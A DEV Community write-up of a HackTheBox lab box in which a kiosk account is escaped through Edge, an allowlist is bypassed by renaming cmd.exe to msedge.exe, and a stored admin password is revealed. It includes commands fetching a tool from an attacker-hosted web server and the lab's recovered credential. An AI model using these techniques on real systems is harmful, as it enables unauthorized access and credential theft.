DEV Community

Cover image for HackTheBox: vulnEscape Writeup
Yogeshwar Peela
Yogeshwar Peela

Posted on • Originally published at exploitnotes.hashnode.dev

HackTheBox: vulnEscape Writeup

Summary

Escape is a Windows box that exposes only RDP (3389). The RDP session drops you into a locked-down kiosk account (KioskUser0) meant for a "Conference Display" app. The box is solved entirely through a kiosk breakout: abusing Edge's address bar to browse the local filesystem, bypassing an application allowlist by renaming binaries, then finding a third-party RDP client (Remote Desktop Plus) with saved-but-masked credentials for the admin account. Those credentials are recovered with a Nirsoft password-reveal tool, and admin turns out to be a local administrator, giving full SYSTEM-level access after a UAC prompt.


Reconnaissance

Only one port open - RDP:

nmap -A -Pn <machine-ip> -oA nmap

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Escape
| rdp-ntlm-info:
|   Target_Name: ESCAPE
|   NetBIOS_Domain_Name: ESCAPE
|   NetBIOS_Computer_Name: ESCAPE
|   DNS_Domain_Name: Escape
|   DNS_Computer_Name: Escape
|   Product_Version: 10.0.19041
Enter fullscreen mode Exit fullscreen mode

Full port scan confirmed only 3389/tcp is reachable. Windows 11-based build, standalone workgroup box (ESCAPE).

Added it to hosts and connected:

echo '<machine-ip> escape.vl ESCAPE.VL' >> /etc/hosts
xfreerdp /v:<machine-ip> /cert:ignore /sec:tls
Enter fullscreen mode Exit fullscreen mode

The login screen tells you exactly what to do:

Conference Display - Login as KioskUser0 without Password


Foothold - Breaking Out of the Kiosk

Logging in as KioskUser0 drops you straight into a wallpaper ("Busan Expo") with no visible taskbar or icons. Clicking around does nothing.

  • Pressing the Windows key brings up the Start menu / search bar.
  • Searching cmd and clicking it → does nothing (blocked).
  • Searching edgeopens successfully. So the restriction looks like an allowlist, not a blocklist — only specific apps (like Edge) are permitted to launch.
  • With Edge open, typing C:\ directly into the address bar renders a directory listing of the filesystem (Edge treats it as a local file:// browse). This is enough to walk the entire disk from the browser.

Browsing to the kiosk user's desktop:

C:\Users\KioskUser0\Desktop\user.txt
Enter fullscreen mode Exit fullscreen mode
user.txt: [REDACTED]
Enter fullscreen mode Exit fullscreen mode

Getting a real shell - allowlist bypass

Browsing to C:\Windows\System32\, I located cmd.exe and downloaded it via Edge into the Downloads folder. Running it directly failed:

제한 사항 (Restriction)
이 작업은 시스템 제한 때문에 취소되었습니다. 시스템 관리자에게 문의하십시오.
(This operation was cancelled due to system restrictions. Contact your administrator.)
Enter fullscreen mode Exit fullscreen mode

Renaming the downloaded binary didn't help at first — but since Edge (msedge.exe) is the one thing the allowlist actually permits, renaming cmd.exemsedge.exe and running it bypassed the restriction entirely and popped a working shell:

C:\Users\kioskUser0\Downloads>whoami
escape\kioskuser0

C:\Users\kioskUser0\Downloads>whoami /all
USER INFORMATION
----------------
User Name          SID
escape\kioskuser0  S-1-5-21-3698417267-3345840482-3422164602-1002

GROUP INFORMATION (relevant)
BUILTIN\Remote Desktop Users
BUILTIN\Users
Mandatory Label\Medium Mandatory Level

PRIVILEGES INFORMATION
SeShutdownPrivilege            Disabled
SeChangeNotifyPrivilege        Enabled
SeUndockPrivilege              Disabled
SeIncreaseWorkingSetPrivilege  Disabled
SeTimeZonePrivilege            Disabled
Enter fullscreen mode Exit fullscreen mode

Same rename trick works for powershell.exe (download it, rename to msedge.exe, run it) to get a real PowerShell session instead of cmd.


Enumeration as kioskuser0

PS C:\Users> dir
admin
Administrator
DefaultAppPool
kioskUser0
Public

PS C:\Users> cd .\admin\
dir : Access to the path 'C:\Users\admin' is denied.

PS C:\Users> net user
admin   Administrator   DefaultAccount
Guest   kioskUser0      WDAGUtilityAccount
Enter fullscreen mode Exit fullscreen mode

Can't read admin's profile directly, but a hidden admin-owned folder is visible at the root of C:\:

PS C:\> Get-ChildItem -Force
d--h--   _admin
...
d-----   temp
Enter fullscreen mode Exit fullscreen mode
PS C:\_admin> ls
installers/
passwords/
temp/
Default.rdp
profiles.xml
Enter fullscreen mode Exit fullscreen mode

profiles.xml is a config file for a third-party RDP client:

PS C:\_admin> type .\profiles.xml
<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
  <Profile>
    <ProfileName>admin</ProfileName>
    <UserName>127.0.0.1</UserName>
    <Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
    <Secure>False</Secure>
  </Profile>
</Data>
Enter fullscreen mode Exit fullscreen mode

An encrypted/encoded password for the admin profile — but we can't decrypt it manually, so the plan is to load it into the actual Remote Desktop Plus app and let the GUI decrypt it for us.


Recovering the Password

Remote Desktop Plus is installed under Program Files (x86):

PS C:\Program Files (x86)> ls
Remote Desktop Plus/

PS C:\Program Files (x86)\Remote Desktop Plus> ls
rdp.exe
Enter fullscreen mode Exit fullscreen mode

Since C:\_admin isn't writable/reachable from the app's file picker, first copy profiles.xml somewhere the low-priv user can access:

copy C:\_admin\profiles.xml C:\Users\kioskUser0\Downloads\
Enter fullscreen mode Exit fullscreen mode

Ran rdp.exeManage ProfilesImport → selected the copied profiles.xml. The admin profile now loads in the app, with the password field shown as bullets (••••••••). Double-clicking / editing / copying the field is all blocked — no cleartext, no clipboard.

To reveal it, used a Nirsoft tool that reads masked password fields from Windows dialogs: BulletsPassView.


# attacker box
unzip bulletspassview.zip
python3 -m http.server 80
Enter fullscreen mode Exit fullscreen mode

Downloaded BulletsPassView.exe onto the target from http://<your-ip>/BulletsPassView.exe (via the browser filesystem trick again), ran it against the open Remote Desktop Plus dialog, and it revealed the masked field:

Password: Twisting30217
Enter fullscreen mode Exit fullscreen mode

Privilege Escalation — kioskuser0admin

Confirmed admin is a local administrator:

PS C:\temp> net user admin
Local Group Memberships   *Administrators
Password required          No
Enter fullscreen mode Exit fullscreen mode

First attempt with runas didn't actually elevate (still showed kioskuser0 after — likely a profile/token quirk with runas in this restricted context):

runas /user:admin powershell
Enter fullscreen mode Exit fullscreen mode

Instead, spawning PowerShell with an elevation request worked and triggered a normal UAC consent prompt:

Start-Process powershell.exe -Verb runas
Enter fullscreen mode Exit fullscreen mode

The prompt asked to allow Windows PowerShell (Microsoft-signed) to make changes — clicked Yes, and landed in an elevated shell:

PS C:\Windows\system32> whoami
escape\admin
Enter fullscreen mode Exit fullscreen mode

Root Flag

PS C:\Users\Administrator\Desktop> ls
Microsoft Edge.lnk
root.txt

PS C:\Users\Administrator\Desktop> type .\root.txt
[REDACTED]
Enter fullscreen mode Exit fullscreen mode

At this point you're escape\admin, a full local administrator with no shell restrictions — from here you can also drop nc64.exe, catch a reverse shell, and operate as SYSTEM without any of the kiosk-mode limitations.


Key Vulnerabilities & Attack Chain

  1. Kiosk breakout via browser LOLBin — Edge's address bar accepts local paths (C:\) and renders a full directory listing, giving filesystem access from a "locked down" kiosk session.
  2. Weak application allowlist — restriction is enforced by filename/allowlist rather than a real AppLocker/SRP hash policy, so simply renaming cmd.exe/powershell.exe to msedge.exe bypasses it entirely.
  3. Cleartext-recoverable stored credentialsRemote Desktop Plus stores admin RDP credentials in a world-readable-once-copied profiles.xml; the app's own password masking is trivially defeated with a generic password-reveal tool (BulletsPassView), since it's just a masked UI field, not real encryption-at-rest protection.
  4. Weak/no password policy — admin account had "password required: No" enabled at some point and a simple password (Twisting30217).
  5. Standard UAC consent — once valid admin credentials/session are available, Start-Process -Verb runas + accepting the UAC prompt is enough to get a fully elevated administrator shell.

Attack Chain

RDP → KioskUser0 (no password)
│
├── Kiosk breakout
│   ├── Win key → Start search
│   │   ├── "cmd"  → blocked (allowlist)
│   │   └── "edge" → allowed
│   └── Edge address bar → C:\  (file:// directory listing)
│       └── user.txt  [FLAG 1]
│
├── Shell access
│   ├── Download cmd.exe / powershell.exe from System32
│   ├── Rename → msedge.exe
│   └── Run → allowlist bypassed → shell as escape\kioskuser0
│
├── Credential discovery
│   ├── C:\_admin\profiles.xml  (Remote Desktop Plus config)
│   ├── copy → C:\Users\kioskUser0\Downloads\
│   ├── Import into rdp.exe (Remote Desktop Plus GUI)
│   │   └── password shown as ●●●●●●●● (masked)
│   └── BulletsPassView.exe (hosted on attacker box, downloaded to target)
│       └── reveals password → Twisting30217
│
└── Privilege escalation
    ├── net user admin → member of Administrators
    ├── runas /user:admin powershell → didn't elevate
    └── Start-Process powershell -Verb runas
        └── UAC prompt → Yes → escape\admin
            └── root.txt  [FLAG 2]
Enter fullscreen mode Exit fullscreen mode

Top comments (0)